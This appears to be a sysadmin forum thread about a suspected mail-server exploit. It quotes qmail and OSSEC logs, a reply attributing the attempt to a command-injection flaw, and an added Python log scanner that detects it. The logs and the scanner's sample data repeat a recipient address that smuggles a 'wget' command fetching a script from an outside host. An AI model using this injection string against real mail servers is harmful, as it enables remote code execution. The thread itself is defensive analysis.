New exploit?

Heimer

New Member
I received two mails from my vServer today:
MAILER-DAEMON
Code:
Hi. This is the qmail-send program at abcd.de.
I tried to deliver a bounce message to this address, but the bounce bounced!

<blue@dick.com>:
66.154.10.179 does not like recipient.
Remote host said: 550 <blue@dick.com>: Recipient address rejected: User unknown in relay recipient table
Giving up on 66.154.10.179.

--- Below this line is the original bounce.

Return-Path: <>
Received: (qmail 29825 invoked for bounce); 22 Apr 2010 02:14:38 +0200
Date: 22 Apr 2010 02:14:38 +0200
From: MAILER-DAEMON@abcd.de
To: blue@dick.com
Subject: failure notice

Hi. This is the qmail-send program at abcd.de.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<root+:|wget http://fortunes.in/x1x.php@abcd.de>:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Return-Path: <blue@dick.com>
Received: (qmail 28461 invoked from network); 22 Apr 2010 02:14:29 +0200
Received: from server1.pagetank.com (HELO bluedick) (193.28.153.110)
  by abcd.de with SMTP; 22 Apr 2010 02:14:29 +0200

OSSEC
Code:
OSSEC HIDS Notification.
2010 Apr 22 02:14:39

Received From: v12345->/var/log/syslog
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:38 v12345 qmail: 1271895278.462652 delivery 426: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/



 --END OF NOTIFICATION



OSSEC HIDS Notification.
2010 Apr 22 02:14:39

Received From: v12345->/var/log/mail.info
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:38 v12345 qmail: 1271895278.462652 delivery 426: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/



 --END OF NOTIFICATION



OSSEC HIDS Notification.
2010 Apr 22 02:14:47

Received From: v12345->/var/log/syslog
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:47 v12345 qmail: 1271895287.107221 delivery 427: failure: 66.154.10.179_does_not_like_recipient./Remote_host_said:_550_<blue@dick.com>:_Recipient_address_rejected:_User_unknown_in_relay_recipient_table/Giving_up_on_66.154.10.179./



 --END OF NOTIFICATION



OSSEC HIDS Notification.
2010 Apr 22 02:14:47

Received From: v12345->/var/log/mail.info
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

Apr 22 02:14:47 v12345 qmail: 1271895287.107221 delivery 427: failure: 66.154.10.179_does_not_like_recipient./Remote_host_said:_550_<blue@dick.com>:_Recipient_address_rejected:_User_unknown_in_relay_recipient_table/Giving_up_on_66.154.10.179./



 --END OF NOTIFICATION

A Google search for
Code:
root+:|wget http://fortunes.in/x1x.php
also turns up a few hits, but they mostly refer to Postfix.
The posts found are all fairly recent, though, so it seems to be a new exploit.
Here is the excerpt from mail.info:
Code:
Apr 22 02:14:29 v12345 /var/qmail/bin/relaylock[28456]: /var/qmail/bin/relaylock: mail from 193.28.153.110:36980 (server1.pagetank.com)
Apr 22 02:14:29 v12345 qmail-queue-handlers[28460]: Handlers Filter before-queue for qmail started ...
Apr 22 02:14:29 v12345 qmail-queue-handlers[28460]: from=blue@dick.com
Apr 22 02:14:29 v12345 qmail-queue-handlers[28460]: to=root+:|wget http://fortunes.in/x1x.php
Apr 22 02:14:35 v12345 qmail: 1271895275.730583 new msg 29819599
Apr 22 02:14:35 v12345 qmail: 1271895275.730688 info msg 29819599: bytes 200 from <blue@dick.com> qp 28461 uid 2020
Apr 22 02:14:38 v12345 qmail: 1271895278.321365 starting delivery 426: msg 29819599 to local root+:|wget_http://fortunes.in/x1x.php@v12345.1blu.de
Apr 22 02:14:38 v12345 qmail: 1271895278.321430 status: local 1/10 remote 0/20
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: Handlers Filter before-local for qmail started ...
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: from=blue@dick.com
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: to=root+:|wget http://fortunes.in/x1x.php@v12345.1blu.de
Apr 22 02:14:38 v12345 qmail-local-handlers[29813]: mailbox: /var/qmail/alias 
Apr 22 02:14:38 v12345 qmail: 1271895278.462652 delivery 426: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/
Apr 22 02:14:38 v12345 qmail: 1271895278.462952 status: local 0/10 remote 0/20
Apr 22 02:14:38 v12345 qmail-queue-handlers[29824]: Handlers Filter before-queue for qmail started ...
Apr 22 02:14:38 v12345 qmail-queue-handlers[29824]: from=
Apr 22 02:14:38 v12345 qmail-queue-handlers[29824]: to=blue@dick.com
Apr 22 02:14:42 v12345 qmail: 1271895282.873598 bounce msg 29819599 qp 29824
Apr 22 02:14:42 v12345 qmail: 1271895282.873682 end msg 29819599
Apr 22 02:14:42 v12345 qmail: 1271895282.875943 new msg 29819662
Apr 22 02:14:42 v12345 qmail: 1271895282.876026 info msg 29819662: bytes 762 from <> qp 29825 uid 2522
Apr 22 02:14:45 v12345 qmail: 1271895285.530506 starting delivery 427: msg 29819662 to remote blue@dick.com
Apr 22 02:14:45 v12345 qmail: 1271895285.530594 status: local 0/10 remote 1/20
Apr 22 02:14:45 v12345 qmail-remote-handlers[30005]: Handlers Filter before-remote for qmail started ...
Apr 22 02:14:45 v12345 qmail-remote-handlers[30005]: from=postmaster@v12345.1blu.de
Apr 22 02:14:45 v12345 qmail-remote-handlers[30005]: to=blue@dick.com
Apr 22 02:14:47 v12345 qmail: 1271895287.107221 delivery 427: failure: 66.154.10.179_does_not_like_recipient./Remote_host_said:_550_<blue@dick.com>:_Recipient_address_rejected:_User_unknown_in_relay_recipient_table/Giving_up_on_66.154.10.179./
Apr 22 02:14:47 v12345 qmail: 1271895287.111178 status: local 0/10 remote 0/20
Does anyone have more details on what exactly this is?
 
Someone is trying to exploit a vulnerability in Amavis (?) that makes it possible to execute arbitrary commands on the server using such interesting recipient addresses.
But if your server reacts like that, everything seems to be fine - I also had a few interesting delivery attempts like that today.
Unfortunately I can't find the Heise article about it right now...
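A defender-side check for the pattern discussed in this thread, added here as an example and not part of either post or of qmail itself: it pulls recipient addresses out of the qmail-queue-handlers "to=" lines and the qmail-send "starting delivery ... to local" lines quoted above, and flags local parts that carry shell metacharacters, a ':' or a download/interpreter command name, which is what a pipe-style recipient like the one in the log looks like in mail.info. The sample log is constructed from the lines in the post; alice+newsletter@example.com is an assumed benign address.

```python
import re
# Constructed sample in the qmail log shapes shown in the post: the first two
# lines are the injection attempt from the thread, the other two are benign.
SAMPLE_LOG = """\
Apr 22 02:14:29 v12345 qmail-queue-handlers[28460]: to=root+:|wget http://fortunes.in/x1x.php
Apr 22 02:14:38 v12345 qmail: 1271895278.321365 starting delivery 426: msg 29819599 to local root+:|wget_http://fortunes.in/x1x.php@v12345.1blu.de
Apr 22 02:14:45 v12345 qmail: 1271895285.530506 starting delivery 427: msg 29819662 to remote blue@dick.com
Apr 22 02:15:03 v12345 qmail-queue-handlers[28470]: to=alice+newsletter@example.com
"""

# Recipient extraction for both line shapes: "to=<addr>" from the handler
# filters, and "to local|remote <addr>" from qmail-send (spaces logged as '_').
RECIPIENT_PATTERNS = [
    re.compile(r"qmail-(?:queue|local|remote)-handlers\[\d+\]: to=(.+)$"),
    re.compile(r"starting delivery \d+: msg \d+ to (?:local|remote) (\S+)$"),
]
# '|' is legal in an RFC 5321 local part, which is exactly why a handler that
# shells out must never trust it; ':' and whitespace are not legal there at all.
SHELL_META = re.compile(r"[|;&<>`\s]|\$\(")
DOWNLOADER = re.compile(r"(?<![a-z0-9])(?:wget|curl|bash|perl)(?![a-z0-9])", re.I)

def local_part(address):
    """Everything before the last '@' (the whole string if there is none)."""
    return address.rsplit("@", 1)[0]

def recipient_from_line(line):
    """The recipient logged on this line, or None for non-recipient lines."""
    matches = (p.search(line) for p in RECIPIENT_PATTERNS)
    return next((m.group(1) for m in matches if m), None)

def suspicious_reasons(address):
    """Why an address looks like a command-injection attempt; empty if clean."""
    lp = local_part(address)
    reasons = []
    if SHELL_META.search(lp):
        reasons.append("shell metacharacter in local part")
    if ":" in lp:
        reasons.append("':' is not valid in a local part")
    if DOWNLOADER.search(lp):
        reasons.append("download/interpreter command name in local part")
    return reasons

def scan_log(log_text):
    """(address, reasons) for every recipient in the log that trips a check."""
    hits = []
    for line in log_text.splitlines():
        addr = recipient_from_line(line)
        if addr and (reasons := suspicious_reasons(addr)):
            hits.append((addr, reasons))
    return hits
```

Run it against a real mail.info with `scan_log(open("/var/log/mail.info").read())`; a clean server should return an empty list, and the two hits from the sample are the delivery attempt the thread describes.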
 